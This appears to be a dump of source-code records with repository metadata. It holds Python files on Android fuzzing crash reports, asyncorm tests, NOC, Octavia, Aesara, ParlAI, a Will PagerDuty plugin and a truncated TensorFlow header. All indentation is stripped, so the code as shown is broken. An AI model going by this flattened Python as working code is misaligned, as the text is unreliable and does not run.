print("%s: %d" % (apk_file_name, len(set(other_crashes_signature_str_dict[apk_file_name]))))
total_number_of_other_crashes += len(set(other_crashes_signature_str_dict[apk_file_name]))
print("#total other crashes: %d" % total_number_of_other_crashes)
# output the complete stack traces of all the other crashes (i.e., non-target crashes)
tmp_output_dir = os.path.join(args.o, "other_crashes")
if os.path.exists(tmp_output_dir):
shutil.rmtree(tmp_output_dir)
for apk_file_name in other_crashes_complete_exception_trace_dict:
print("dump complete crash stack for: %s" % apk_file_name)
tmp_output_dir_of_each_apk = os.path.join(tmp_output_dir, apk_file_name)
if not os.path.exists(tmp_output_dir_of_each_apk):
os.makedirs(tmp_output_dir_of_each_apk)
stack_traces: List[List[str]] = other_crashes_complete_exception_trace_dict[apk_file_name]
file_index = 0
for stack_trace in stack_traces:
tmp_file_path = os.path.join(tmp_output_dir_of_each_apk, "crash_stack_" + str(file_index) + ".txt")
file_index += 1
with open(tmp_file_path, "w") as tmp_file:
for line in stack_trace:
tmp_file.write(line)
tmp_file.close()
if __name__ == '__main__':
ap = ArgumentParser()
ap.add_argument('-o', required=True, help="the output directory of testing results")
ap.add_argument('-v', default=False, action='store_true')
# supported fuzzing tools
ap.add_argument('--monkey', default=False, action='store_true')
ap.add_argument('--ape', default=False, action='store_true')
ap.add_argument('--timemachine', default=False, action='store_true')
ap.add_argument('--combo', default=False, action='store_true')
ap.add_argument('--humanoid', default=False, action='store_true')
ap.add_argument('--sapienz', default=False, action='store_true')
ap.add_argument('--qtesting', default=False, action='store_true')
ap.add_argument('--weighted', default=False, action='store_true')
ap.add_argument('--fastbot', default=False, action='store_true')
ap.add_argument('--wetest', default=False, action='store_true')
ap.add_argument('--newmonkey', default=False, action='store_true')
ap.add_argument('--app', type=str, dest='app_name')
ap.add_argument('--id', type=str, dest='issue_id')
ap.add_argument('--csv', type=str, dest='final_result_csv_file_path')
ap.add_argument('--simple', default=False, action='store_true', dest='simple_format',
help="standard output in a simple format")
ap.add_argument('--other_crashes', default=False, action='store_true', dest='other_crashes')
args = ap.parse_args()
if not os.path.exists(args.o):
ap.error("Error: the output directory does not exist!")
if args.final_result_csv_file_path is not None and os.path.exists(args.final_result_csv_file_path):
os.remove(args.final_result_csv_file_path)
main(args)
|
888d2418623333eaf2c6b92cebe80b22f8998ea7
|
645a7db93e9d7a4f3074ad482a1f57071556d2c4
|
/tests/test_module.py
|
5f802818c8ceb865432f077116791fe29ef648b4
|
[
"Apache-2.0"
] |
permissive
|
monobot/asyncorm
|
852152c08b2dca3020699588bb675b188c1b89f3
|
6342e2d5fbaa22fb368aead772ac4f255df7562a
|
refs/heads/development
| 2023-07-20T09:17:00.568299
| 2020-08-20T10:30:30
| 2020-08-20T10:30:30
| 82,396,221
| 207
| 20
|
NOASSERTION
| 2023-07-07T03:01:37
| 2017-02-18T15:31:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
test_module.py
|
from asyncorm.application.configure import configure_orm, get_model, orm_app
from asyncorm.exceptions import AsyncOrmAppError, AsyncOrmModelError, AsyncOrmModelNotDefined
from asyncorm.test_case import AsyncormTestCase
Book = get_model("Book")
db_config = {"database": "asyncorm", "host": "localhost", "user": "ormdbuser", "password": "ormDbPass"}
class ModuleTests(AsyncormTestCase):
def test_ormconfigure_no_models(self):
orm = configure_orm({"db_config": db_config, "apps": None})
with self.assertRaises(AsyncOrmAppError) as exc:
orm.get_model("here.what")
self.assertTrue("There are no apps declared in the orm" == exc.exception.args[0])
def test_ormconfigure_no_db_config(self):
with self.assertRaises(AsyncOrmAppError) as exc:
configure_orm({"apps": ["tests.app_1", "tests.app_2"]})
self.assertIn("Imposible to configure without database", exc.exception.args[0])
def test_get_model_not_correct_format(self):
orm = configure_orm({"db_config": db_config, "apps": ["tests.app_1", "tests.app_2"]})
with self.assertRaises(AsyncOrmModelError) as exc:
orm.get_model("here.there.what")
self.assertIn("The string declared should be in format ", exc.exception.args[0])
def test_get_model_model_does_not_exist(self):
with self.assertRaises(AsyncOrmModelNotDefined) as exc:
get_model("Tato")
self.assertIn("The model does not exists", exc.exception.args[0])
def test_the_data_is_persistent_db_backend(self):
# the orm is configure on the start of tests, but the data is kept
self.assertEqual(orm_app.db_backend._connection_data["password"], db_config["password"])
def test_the_data_is_persistent_database(self):
self.assertEqual(orm_app.db_backend._connection_data["database"], db_config["database"])
def test_the_data_is_persistent_orm_model(self):
configure_orm({"db_config": db_config, "apps": ["tests.app_1.appo", "tests.app_2"]})
# every model declared has the same db_backend
self.assertTrue(orm_app.db_backend is Book.objects.db_backend)
|
89e3b77cf75c7caa4f7f50044409c441ee040e95
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/services/card/cards/path.py
|
728c7d9171e2e2bdc88b59dc88b497f72afa700f
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,585
|
py
|
path.py
|
# ----------------------------------------------------------------------
# Path
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
import orjson
# NOC modules
from .base import BaseCard
from noc.sa.models.managedobject import ManagedObject
from noc.core.topology.path import get_shortest_path
from noc.core.comp import smart_text
class PathCard(BaseCard):
name = "path"
default_template_name = "path"
card_css = ["/ui/pkg/leaflet/leaflet.css", "/ui/card/css/path.css"]
card_js = ["/ui/pkg/leaflet/leaflet.js", "/ui/card/js/path.js"]
def get_data(self):
mo1, mo2 = self.id.split("-")
print(self.id)
mo1 = ManagedObject.get_by_id(int(mo1)) if mo1 else None
mo2 = ManagedObject.get_by_id(int(mo2)) if mo2 else None
s_path = [mo1]
if mo1 and mo2:
try:
s_path = get_shortest_path(mo1, mo2)
except ValueError:
s_path = [mo1, mo2]
path = []
for mo in s_path:
if not mo.x or not mo.y:
continue
if not path or mo.x != path[-1]["x"] or mo.y != path[-1]["y"]:
path += [{"x": mo.x, "y": mo.y, "objects": [{"id": mo.id, "name": mo.name}]}]
else:
path[-1]["objects"] += [{"id": mo.id, "name": mo.name}]
return {"mo1": mo1, "mo2": mo2, "path": smart_text(orjson.dumps(path))}
|
88576daf8b12aec26af13483581aee6d5c129700
|
99199db3f78a344e72b281c71c690518ae07375a
|
/octavia/api/root_controller.py
|
272fad78d1602b51c17dec99dd9114fdb4374762
|
[
"Apache-2.0"
] |
permissive
|
openstack/octavia
|
3faf2afe2ade5bd3978bb3a0558d2eeefc648ba2
|
0426285a41464a5015494584f109eed35a0d44db
|
refs/heads/master
| 2023-09-01T20:12:48.272344
| 2023-08-31T17:24:04
| 2023-08-31T17:24:04
| 21,018,188
| 147
| 180
|
Apache-2.0
| 2021-03-30T12:34:30
| 2014-06-19T22:47:19
|
Python
|
UTF-8
|
Python
| false
| false
| 6,862
|
py
|
root_controller.py
|
# Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_middleware import healthcheck
from pecan import abort as pecan_abort
from pecan import expose as pecan_expose
from pecan import request as pecan_request
from wsme import types as wtypes
from wsmeext import pecan as wsme_pecan
from octavia.api.v2 import controllers as v2_controller
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RootController(object):
"""The controller with which the pecan wsgi app should be created."""
def __init__(self):
super().__init__()
setattr(self, 'v2.0', v2_controller.V2Controller())
setattr(self, 'v2', v2_controller.V2Controller())
if CONF.api_settings.healthcheck_enabled:
self.healthcheck_obj = healthcheck.Healthcheck.app_factory(None)
# Run the oslo middleware healthcheck for /healthcheck
@pecan_expose('json')
@pecan_expose(content_type='text/plain')
@pecan_expose(content_type='text/html')
def healthcheck(self): # pylint: disable=inconsistent-return-statements
if CONF.api_settings.healthcheck_enabled:
if pecan_request.method not in ['GET', 'HEAD']:
pecan_abort(405)
return self.healthcheck_obj.process_request(pecan_request)
pecan_abort(404)
def _add_a_version(self, versions, version, url_version, status,
timestamp, base_url):
versions.append({
'id': version,
'status': status,
'updated': timestamp,
'links': [{
'href': base_url + url_version,
'rel': 'self'
}]
})
@wsme_pecan.wsexpose(wtypes.text)
def index(self):
host_url = pecan_request.path_url
if not host_url.endswith('/'):
host_url = '{}/'.format(host_url)
versions = []
self._add_a_version(versions, 'v2.0', 'v2', 'SUPPORTED',
'2016-12-11T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.1', 'v2', 'SUPPORTED',
'2018-04-20T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.2', 'v2', 'SUPPORTED',
'2018-07-31T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.3', 'v2', 'SUPPORTED',
'2018-12-18T00:00:00Z', host_url)
# amp statistics
self._add_a_version(versions, 'v2.4', 'v2', 'SUPPORTED',
'2018-12-19T00:00:00Z', host_url)
# Tags
self._add_a_version(versions, 'v2.5', 'v2', 'SUPPORTED',
'2019-01-21T00:00:00Z', host_url)
# Flavors
self._add_a_version(versions, 'v2.6', 'v2', 'SUPPORTED',
'2019-01-25T00:00:00Z', host_url)
# Amphora Config update
self._add_a_version(versions, 'v2.7', 'v2', 'SUPPORTED',
'2018-01-25T12:00:00Z', host_url)
# TLS client authentication
self._add_a_version(versions, 'v2.8', 'v2', 'SUPPORTED',
'2019-02-12T00:00:00Z', host_url)
# HTTP Redirect code
self._add_a_version(versions, 'v2.9', 'v2', 'SUPPORTED',
'2019-03-04T00:00:00Z', host_url)
# Healthmonitor host header
self._add_a_version(versions, 'v2.10', 'v2', 'SUPPORTED',
'2019-03-05T00:00:00Z', host_url)
# Additive batch member update
self._add_a_version(versions, 'v2.11', 'v2', 'SUPPORTED',
'2019-06-24T00:00:00Z', host_url)
# VIP ACL
self._add_a_version(versions, 'v2.12', 'v2', 'SUPPORTED',
'2019-09-11T00:00:00Z', host_url)
# SOURCE_IP_PORT algorithm
self._add_a_version(versions, 'v2.13', 'v2', 'SUPPORTED',
'2019-09-13T00:00:00Z', host_url)
# Availability Zones
self._add_a_version(versions, 'v2.14', 'v2', 'SUPPORTED',
'2019-11-10T00:00:00Z', host_url)
# TLS cipher options
self._add_a_version(versions, 'v2.15', 'v2', 'SUPPORTED',
'2020-03-10T00:00:00Z', host_url)
# Additional UDP Healthcheck Types (HTTP/TCP)
self._add_a_version(versions, 'v2.16', 'v2', 'SUPPORTED',
'2020-03-15T00:00:00Z', host_url)
# Listener TLS versions
self._add_a_version(versions, 'v2.17', 'v2', 'SUPPORTED',
'2020-04-29T00:00:00Z', host_url)
# Pool TLS versions
self._add_a_version(versions, 'v2.18', 'v2', 'SUPPORTED',
'2020-04-29T01:00:00Z', host_url)
# Add quota support to octavia's l7policy and l7rule
self._add_a_version(versions, 'v2.19', 'v2', 'SUPPORTED',
'2020-05-12T00:00:00Z', host_url)
# ALPN protocols (listener)
self._add_a_version(versions, 'v2.20', 'v2', 'SUPPORTED',
'2020-08-02T00:00:00Z', host_url)
# Amphora delete
self._add_a_version(versions, 'v2.21', 'v2', 'SUPPORTED',
'2020-09-03T00:00:00Z', host_url)
# Add PROXYV2 pool protocol
self._add_a_version(versions, 'v2.22', 'v2', 'SUPPORTED',
'2020-09-04T00:00:00Z', host_url)
# SCTP protocol
self._add_a_version(versions, 'v2.23', 'v2', 'SUPPORTED',
'2020-09-07T00:00:00Z', host_url)
# ALPN protocols (pool)
self._add_a_version(versions, 'v2.24', 'v2', 'SUPPORTED',
'2020-10-15T00:00:00Z', host_url)
# PROMETHEUS listeners
self._add_a_version(versions, 'v2.25', 'v2', 'SUPPORTED',
'2021-10-02T00:00:00Z', host_url)
# Additional VIPs
self._add_a_version(versions, 'v2.26', 'v2', 'SUPPORTED',
'2022-08-29T00:00:00Z', host_url)
# HTTP Strict Transport Security (HSTS)
self._add_a_version(versions, 'v2.27', 'v2', 'CURRENT',
'2023-05-05T00:00:00Z', host_url)
return {'versions': versions}
|
3dbc3a391abb0d7c39f04a090698036730548e02
|
532ad1aedff8528b2e8af4e4e752f32d58b92b0d
|
/aesara/compile/compilelock.py
|
bdd895fff7ac68e0764a793ccfaeb9d48ec1b212
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
aesara-devs/aesara
|
ebaa204159d4ddb94ede10580c5b8e39d114713f
|
b5a3cf45f0f6762bb4bb0e2c657f7d3822c74595
|
refs/heads/main
| 2023-08-09T10:56:56.528283
| 2023-07-15T06:15:49
| 2023-07-15T13:28:29
| 221,231,590
| 861
| 142
|
NOASSERTION
| 2023-09-05T03:16:16
| 2019-11-12T14:02:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
compilelock.py
|
"""
Locking mechanism to ensure no two compilations occur simultaneously
in the same compilation directory (which can cause crashes).
"""
import os
import threading
from contextlib import contextmanager
from typing import Optional, Union
import filelock
from aesara.configdefaults import config
__all__ = [
"force_unlock",
"lock_ctx",
]
class ThreadFileLocks(threading.local):
def __init__(self):
self._locks = {}
local_mem = ThreadFileLocks()
def force_unlock(lock_dir: os.PathLike):
"""Forces the release of the lock on a specific directory.
Parameters
----------
lock_dir : os.PathLike
Path to a directory that was locked with `lock_ctx`.
"""
fl = filelock.FileLock(os.path.join(lock_dir, ".lock"))
fl.release(force=True)
dir_key = f"{lock_dir}-{os.getpid()}"
if dir_key in local_mem._locks:
del local_mem._locks[dir_key]
@contextmanager
def lock_ctx(
lock_dir: Union[str, os.PathLike] = None, *, timeout: Optional[float] = None
):
"""Context manager that wraps around FileLock and SoftFileLock from filelock package.
Parameters
----------
lock_dir
A directory for which to acquire the lock.
Defaults to `aesara.config.compiledir`.
timeout
Timeout in seconds for waiting in lock acquisition.
Defaults to `aesara.config.compile__timeout`.
"""
if lock_dir is None:
lock_dir = config.compiledir
if timeout is None:
timeout = config.compile__timeout
# locks are kept in a dictionary to account for changing compiledirs
dir_key = f"{lock_dir}-{os.getpid()}"
if dir_key not in local_mem._locks:
local_mem._locks[dir_key] = True
fl = filelock.FileLock(os.path.join(lock_dir, ".lock"))
fl.acquire(timeout=timeout)
try:
yield
finally:
if fl.is_locked:
fl.release()
if dir_key in local_mem._locks:
del local_mem._locks[dir_key]
else:
yield
|
eda48384b6609db04656ef39ac079f1291fcad71
|
1dbbb05b30d27c6419b9f34eea3b9a47f92582a0
|
/parlai/tasks/convai2/agents.py
|
6811226d64863c5959f3f884677247ffe66815ab
|
[
"MIT",
"CC-BY-4.0"
] |
permissive
|
facebookresearch/ParlAI
|
815334323d0ebef51bf9837336fe3eef6fe1655d
|
e1d899edfb92471552bae153f59ad30aa7fca468
|
refs/heads/main
| 2023-08-31T22:20:45.918129
| 2023-08-14T19:39:56
| 2023-08-14T19:39:56
| 89,266,735
| 10,943
| 2,395
|
MIT
| 2023-09-13T23:07:40
| 2017-04-24T17:10:44
|
Python
|
UTF-8
|
Python
| false
| false
| 7,372
|
py
|
agents.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDeprecatedDialogTeacher, YamlTeacher
from parlai.utils.data import DatatypeHelper
from parlai.utils.misc import warn_once
from .build import build
from parlai.utils.strings import normalize_reply
import parlai.utils.logging as logging
from parlai.core.params import ParlaiParser
from typing import Optional
from parlai.core.opt import Opt
import copy
import os
'''All teachers have a version with and without label candidates. Each teacher
defaults to using a dataset with label candidates. To use a dataset without
label candidates, specify this using the task flag:
--task convai2:{TEACHER_NAME}:no_cands
where TEACHER_NAME is None, SelfOriginal (Self), or SelfRevised.
'''
def _path(opt, persona, use_cands):
# Build the data if it doesn't exist.
build(opt)
datatype = opt['datatype'].split(':')[0]
if datatype == 'test':
warn_once("WARNING: Test set not included. Setting datatype to valid.")
datatype = 'valid'
dt = datatype + '_' + persona
cands = '' if use_cands else '_no_cands'
return os.path.join(opt['datapath'], 'ConvAI2', dt + cands + '.txt')
class BothTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'both_original', use_cands)
super().__init__(opt, shared)
class NoneTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'none_original', use_cands)
super().__init__(opt, shared)
class SelfOriginalTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'self_original', use_cands)
super().__init__(opt, shared)
class SelfTeacher(SelfOriginalTeacher):
pass
class SelfRevisedTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'self_revised', use_cands)
super().__init__(opt, shared)
class NormalizedTeacherTrait(object):
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
agent = parser.add_argument_group('NormalizedTeacher arguments')
agent.add_argument(
'--your-persona-first',
type='bool',
default=True,
help="whether to prepend your persona followed by partner's persona. True by default to be consistent with the BothTeach",
)
agent.add_argument(
'--max-num-turns',
type=int,
default=-1,
help="first X turns per episode to show. If -1 then the whole episode is shown",
)
return agent
def __init__(self, opt, shared=None):
self.max_num_turns = opt["max_num_turns"]
self.your_persona_first = opt["your_persona_first"]
super().__init__(opt, shared)
def normalize_replies(self, x):
xs = x.split('\n')
your_personas = []
partner_personas = []
non_personas = []
for x in xs:
if x.startswith('your persona: '):
# Normalize the sentence appearing after 'your persona:'
x = x[len('your persona: ') :]
x = normalize_reply(x)
x = 'your persona: ' + x
your_personas.append(x)
elif x.startswith("partner's persona: "):
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
partner_personas.append(x)
else:
x = normalize_reply(x)
non_personas.append(x)
xs2 = []
if self.your_persona_first:
xs2.extend(your_personas)
xs2.extend(partner_personas)
else:
xs2.extend(partner_personas)
xs2.extend(your_personas)
xs2.extend(non_personas)
return '\n'.join(xs2)
def setup_data(self, path):
logging.info(f"loading normalized fbdialog data: {path}")
exs_counter = 0
for data, new_episode in super().setup_data(path):
text, labels, reward = data[:3]
candidates = None if len(data) == 3 else data[3]
if new_episode:
exs_counter = 0
if self.max_num_turns > 0 and exs_counter >= self.max_num_turns:
continue
text = self.normalize_replies(text)
labels = [self.normalize_replies(l) for l in labels]
exs_counter += 1
if candidates:
candidates = [self.normalize_replies(c) for c in candidates]
yield (text, labels, reward, candidates), new_episode
else:
yield (text, labels, reward), new_episode
class NormalizedTeacher(NormalizedTeacherTrait, SelfOriginalTeacher):
pass
class NormalizedBothTeacher(NormalizedTeacherTrait, BothTeacher):
pass
class NormalizedTheirTeacher(NormalizedTeacherTrait, BothTeacher):
def normalize_replies(self, x):
xs = x.split('\n')
xs2 = []
for x in xs:
if x.startswith('your persona: '):
continue
elif x.startswith("partner's persona: "):
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
else:
x = normalize_reply(x)
xs2.append(x)
return '\n'.join(xs2)
class NormalizedNoneTeacher(NormalizedTeacherTrait, NoneTeacher):
pass
class DefaultTeacher(SelfOriginalTeacher):
pass
class InteractiveTeacher(SelfOriginalTeacher):
# Dummy class to add arguments for interactive world.
pass
class SelfchatTeacher(SelfOriginalTeacher):
# Dummy class to add arguments for interactive world.
pass
class SampleTeacher(YamlTeacher):
"""
Loads the small sample of data created by the AutoTeacherTests.
"""
def __init__(self, opt, shared=None):
opt = opt.copy()
fold = DatatypeHelper.fold(opt['datatype'])
opt['datafile'] = os.path.join(
os.path.dirname(__file__), f'test/convai2_{fold}.yml'
)
super().__init__(opt, shared)
|
ce9bac8a2748531556b7be2b9ba6786c4ecaef7a
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/addImport/newLastImportInProjectGroup/main.py
|
1a5843fae36318c592afe2040220ab273ae3b9d4
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 37
|
py
|
main.py
|
import sys
import a
print(sys, a, b)
|
75ac83359fd3475438c009ca140ecbb9b99c2d0f
|
da5bcb4a92a802dedf84a74dc2ee4c08cb744656
|
/will/plugins/devops/pagerduty.py
|
d09a50b8ed1168006cab656753e775157c48ab9e
|
[
"MIT"
] |
permissive
|
skoczen/will
|
21981ba1213a49b650d661feb59d69719918446c
|
27a23ce47e3ec11b94f3355c2d2ee94c1958679c
|
refs/heads/master
| 2023-08-16T00:03:47.974919
| 2021-04-13T10:31:26
| 2021-04-13T10:31:26
| 14,900,247
| 359
| 186
|
MIT
| 2023-01-15T17:34:57
| 2013-12-03T17:08:08
|
Python
|
UTF-8
|
Python
| false
| false
| 7,356
|
py
|
pagerduty.py
|
from will.plugin import WillPlugin
from will.decorators import respond_to, periodic, hear, randomly, route, rendered_template, require_settings
from will import settings
import datetime
import pygerduty
class PagerDutyPlugin(WillPlugin):
@staticmethod
def _associate_pd_user(email_address, pager):
try:
user = next(pager.users.list(query=email_address, limit=1))
return user
except StopIteration:
return None
def _get_user_email_from_mention_name(self, mention_name):
try:
u = self.get_user_by_nick(mention_name[1:])
email_address = self.get_user(u['hipchat_id'])['email']
return email_address
except TypeError:
return None
def _update_incident(self, message, incidents, action, assign_to_email=None):
pager = pygerduty.PagerDuty(settings.PAGERDUTY_SUBDOMAIN, settings.PAGERDUTY_API_KEY)
email_address = self.get_user(message.sender['hipchat_id'])['email']
user = self._associate_pd_user(email_address, pager)
if user is None:
self.reply("I couldn't find your user :(")
return
# if incident(s) are given
if incidents:
for i in incidents:
# for specific incident, use show
try:
incident = pager.incidents.show(entity_id=i)
except pygerduty.BadRequest as e:
if e.code == 5001:
self.reply("Incident %s was not found." % i, color="yellow")
continue
if action == 'ack':
try:
incident.acknowledge(requester_id=user.id)
except pygerduty.BadRequest as e:
if e.code == 1001:
self.reply("%s has been already resolved." % i, color="yellow")
continue
elif action == 'resolve':
try:
incident.resolve(requester_id=user.id)
except pygerduty.BadRequest as e:
if e.code == 1001:
self.reply("%s has been already resolved." % i, color="yellow")
continue
elif action == 'reassign':
try:
if assign_to_email is not None:
assign_to = self._associate_pd_user(assign_to_email, pager)
if assign_to is None:
self.reply("Coudn't find the PD user for %s :(" % assign_to_email)
return
else:
incident.reassign(user_ids=[assign_to.id], requester_id=user.id)
except pygerduty.BadRequest:
# ignore any error, maybe it worth to log it somewhere
# in the future
continue
self.reply("Ok.")
# if incident(s) are not given
else:
try:
# acknowledge assigned incidents
if action == 'ack':
for incident in pager.incidents.list(status='triggered', assigned_to=user):
incident.acknowledge(requester_id=user.id)
# acknowledge all incidets
elif action == 'ack_all':
for incident in pager.incidents.list(status='triggered'):
incident.acknowledge(requester_id=user.id)
# resolve assigned incidents
elif action == 'resolve':
for incident in pager.incidents.list(status='acknowledged', assigned_to=user):
incident.resolve(requester_id=user.id)
# resolve all incidents
elif action == 'resolve_all':
for incident in pager.incidents.list(status='acknowledged'):
incident.resolve(requester_id=user.id)
self.reply("Ok.")
except pygerduty.BadRequest:
# ignore any error, might be acked/resolved
pass
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack$")
def ack_all_assigned_incidents(self, message):
self._update_incident(message, None, 'ack')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack (?P<incidents>[0-9 ]*)")
def ack_incidents(self, message, incidents):
self._update_incident(message, incidents.split(" "), 'ack')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack!$")
def ack_all_incidents(self, message):
self._update_incident(message, None, 'ack_all')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve$")
def resolve_all_assigned_and_acknowledged_incidents(self, message):
self._update_incident(message, None, 'resolve')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve (?P<incidents>[0-9 ]*)")
def resolve_incidens(self, message, incidents):
self._update_incident(message, incidents.split(" "), 'resolve')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve!$")
def resolve_all_incidents(self, message):
self._update_incident(message, None, 'resolve_all')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to(r"^pd maintenance (?P<service_name>[\S+ ]+) (?P<interval>[1-9])h$")
def set_service_maintenance(self, message, service_name=None, interval=None):
if not interval:
interval = 1
pager = pygerduty.PagerDuty(settings.PAGERDUTY_SUBDOMAIN, settings.PAGERDUTY_API_KEY)
for service in pager.services.list(limit=50):
if service.name == service_name:
user = self._associate_pd_user(self.get_user(message.sender['hipchat_id'])['email'], pager)
if user is None:
self.reply("I couldn't find your user :(", color="yellow")
return
now = datetime.datetime.utcnow()
start_time = now.strftime("%Y-%m-%dT%H:%MZ")
end_time = (now + datetime.timedelta(hours=int(interval))).strftime("%Y-%m-%dT%H:%MZ")
try:
pager.maintenance_windows.create(service_ids=[service.id], requester_id=user.id,
start_time=start_time,
end_time=end_time)
self.reply("Ok.")
except pygerduty.BadRequest as e:
self.reply("Failed: %s" % e.message, color="yellow")
@respond_to("^pd reassign (?P<incidents>[0-9 ]+)( )(?P<mention_name>[a-zA-Z@]+)$")
def reassign_incidents(self, message, incidents, mention_name):
email_address = self._get_user_email_from_mention_name(mention_name)
if email_address:
self._update_incident(message, incidents.split(" "), 'reassign', email_address)
else:
self.reply("Can't find email address for %s" % mention_name)
|
bedb88273850159a19fa815ba794be82e9019739
|
bade5b29e8ba58adbe440f8eda491e43b2155132
|
/pronto/entity/attributes.py
|
1f7f8ac069c52f64c7dd5877d15dec10a30bf393
|
[
"MIT"
] |
permissive
|
althonos/pronto
|
72697bd0aa0e69b728d70038d340b546de2d5b76
|
9e11c06e71c24685404fc1d0d3a560f4e2cdd3de
|
refs/heads/master
| 2023-08-20T19:46:30.418518
| 2023-08-17T10:27:39
| 2023-08-17T10:27:39
| 62,424,052
| 228
| 60
|
MIT
| 2023-09-04T04:39:11
| 2016-07-01T23:02:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
attributes.py
|
import typing
from typing import Iterable, Iterator
from ..utils.meta import typechecked
from . import Entity, EntitySet
if typing.TYPE_CHECKING:
from ..relationship import Relationship
_E = typing.TypeVar("_E", bound=Entity)
_S = typing.TypeVar("_S", bound=EntitySet)
class Relationships(typing.MutableMapping["Relationship", _S], typing.Generic[_E, _S]):
"""A dedicated mutable mapping to manage the relationships of an entity."""
def __init__(self, entity: _E):
self._inner = entity._data().relationships
self._entity = entity
self._ontology = entity._ontology()
def __getitem__(self, item: "Relationship") -> _S:
if item.id not in self._inner:
raise KeyError(item)
s = self._entity._Set()
s._ids = self._inner[item.id]
s._ontology = self._ontology
return s
def __delitem__(self, item: "Relationship"):
if item.id not in self._inner:
raise KeyError(item)
del self._inner[item.id]
def __len__(self) -> int:
return len(self._inner)
def __iter__(self) -> Iterator["Relationship"]:
from ..relationship import Relationship
return (self._ontology.get_relationship(id_) for id_ in self._inner)
def __setitem__(self, key: "Relationship", entities: Iterable[_E]):
if key._ontology() is not self._ontology:
raise ValueError("cannot use a relationship from a different ontology")
self._inner[key.id] = {entity.id for entity in entities}
|
6d5d1e637d6fd03aad2240d9b5cf0a80d313c209
|
4bcc9806152542ab43fc2cf47c499424f200896c
|
/tensorflow/python/data/experimental/kernel_tests/service/metadata_test.py
|
750b405079c788eedb4ca9df4736ba002609b6ae
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
tensorflow/tensorflow
|
906276dbafcc70a941026aa5dc50425ef71ee282
|
a7f3934a67900720af3d3b15389551483bee50b8
|
refs/heads/master
| 2023-08-25T04:24:41.611870
| 2023-08-25T04:06:24
| 2023-08-25T04:14:08
| 45,717,250
| 208,740
| 109,943
|
Apache-2.0
| 2023-09-14T20:55:50
| 2015-11-07T01:19:20
|
C++
|
UTF-8
|
Python
| false
| false
| 10,418
|
py
|
metadata_test.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
